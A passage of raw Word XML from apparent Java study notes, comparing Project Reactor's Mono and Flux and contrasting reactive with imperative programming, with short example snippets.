          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complete successfully</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ail with an error</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303624C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ignals completion after emitting all values in the stream. It can also emit values indefinitely until an explicit stop condition is met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282DF675"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DD1B">
          <v:rect id="_x0000_i2260" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0654AC44"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Common Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961644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Since Mono deals with a single result, it has operations like then, block, subscribe, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851AF4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or multiple results, Flux supports operations like map, flatMap, filter, take, mergeWith, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDC70D"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60323E">
          <v:rect id="_x0000_i2261" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A2785"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Code Example Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B057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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC77B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Single Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C79CC7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subscribe(System.out::println);  // Output: Single Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A616C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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C3809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4C290D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subscribe(System.out::println);  // Output: A, B, C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFAAFBF"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461C5">
          <v:rect id="_x0000_i2262" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75350913"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Duration of Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAA242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Typically used for single, short-lived interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303A9902"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Typically used for continuous, long-lived interactions like streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530CA037"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D795F6">
          <v:rect id="_x0000_i2263" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B4A8E"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7D17E4A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 0 or 1 element (for single-value scenarios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AAD36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 0 to N elements (for multiple value scenarios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7DB577"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s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when expecting a single result,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when expecting multiple results or streaming data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447F860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64" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B46892C" w14:textId="212507E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8" w:name="_Toc197867722"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does reactive programming differ from imperative programming</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="508"/>
    </w:p>
    <w:p w14:paraId="7A73E91C" w14:textId="1CD59E7D" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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Reactive Programming and Imperative Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC2DB9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F3191B">
          <v:rect id="_x0000_i2265" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB90F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xecution Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345665B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8930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the focus i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he task is performed (step-by-step instructions). You explicitly define the sequence of operations that need to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3727530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 Writing a loop or calling functions to process data in a fixed sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA85C4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synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (you wait for each operation to complete before moving to the next).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E7EC0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Imperative)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0755937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Imperative code to fetch and process user data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79062EE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data = fetchData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42B12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processedData = processData(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02941A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splayData(processedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C5185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2447DC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centered around the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of data changes. It focuses on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streams of data and how to react to changes in that data (observing and responding to events over time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B266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typically used in scenarios where there are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple data sources or events</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> happening in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C775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asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (operations don't block the main thread; they work in the background and notify when done).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561BE4A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Reactive)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071ED70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Reactive programming with RxJava or Project Reactor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BAF3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just(fetchData())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC8C2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ap(this::processData)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C93AC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doOnTerminate(() -&gt; displayData(processedData))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0241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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D4F9E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16F34F">
          <v:rect id="_x0000_i2266" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C84805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Concurrency and Asynchrony</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D61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7D067A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ypically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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712604B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Operations are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—the program execution waits for one operation to finish before starting the next one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A904C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fficult to scale for handling large numbers of concurrent operations or multiple I/O-bound tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC851D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BF77A1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4014BD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works with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streams of data</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are processed asynchronously. Instead of blocking on each operation, the system can respond to other tasks while waiting for some operations to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6C53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tter suited for scenarios involving </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as web servers or UI updates in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42890847"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0D0A6">
          <v:rect id="_x0000_i2267" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F6D4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State Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DFFC5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BE023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imperative code, the state is </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutated</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly. The programmer manages how the state is changed at each step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CEBC7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ample: Variables are modified in-place, and operations are executed one by one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362045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0F1AAC71"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often modeled as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ows of data</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Data can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>observed</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and transformations or side effects can be applied </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactively</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when changes occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5624D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w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (data does not change in-place, but rather a new stream or event is emitted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCF67D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D15DEC">
          <v:rect id="_x0000_i2268" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFEEA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Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73049D4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131236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by traditional mechanisms such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are thrown and caught by the programmer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD150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ypically synchronous handling of errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEA0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77577E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as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>part of the stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data. You can handle errors using specialized operators (like onErrorResume, onErrorReturn in Project Reactor, or RxJava).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC968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 handling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allowing non-blocking recovery from errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621853E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D1D0B">
          <v:rect id="_x0000_i2269" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A576CB4"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Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F2208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D71E3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Good for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>simple, sequential tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF9D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orks well when you can process data sequentially and don't have a need for handling multiple events concurrently (e.g., simple algorithms, command-line programs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404AFE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1815D11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xcellent for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven syste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eal-time applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and systems that need to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., web applications, real-time analytics, UI updates, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1803C20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st suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where performance and responsiveness are important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6336D8AF"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02802">
          <v:rect id="_x0000_i2270" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A23AB7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Libraries and Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55767B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D794E4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Java's </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traditional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> paradigms (loops, conditionals).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BDDB7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like </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread</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ExecutorService</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CompletableFuture</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for some asynchronous execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B98D82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1A9BA2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such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RxJava</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Project Reactor</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Akka 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Vert.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are designed to simplify the writing of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous, non-blocking code</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7757E79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Web frameworks like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use these principles for building highly scalable and reactive web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025BD816"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B95B0">
          <v:rect id="_x0000_i2271" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="187D63D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Code Readability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BEA2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002A9B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Code tends to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>easier to understand</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it follows a clear and linear sequence of operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1136B41F"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sier to follow for small applications or systems with few data dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA8B16C"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34AB63D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Code can become </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to the asynchronous nature of execution, especially when dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple concurrent operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and event handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E22D0D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equires understanding of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observer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unctional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> concepts.</w:t>
      </w:r>
    </w:p>
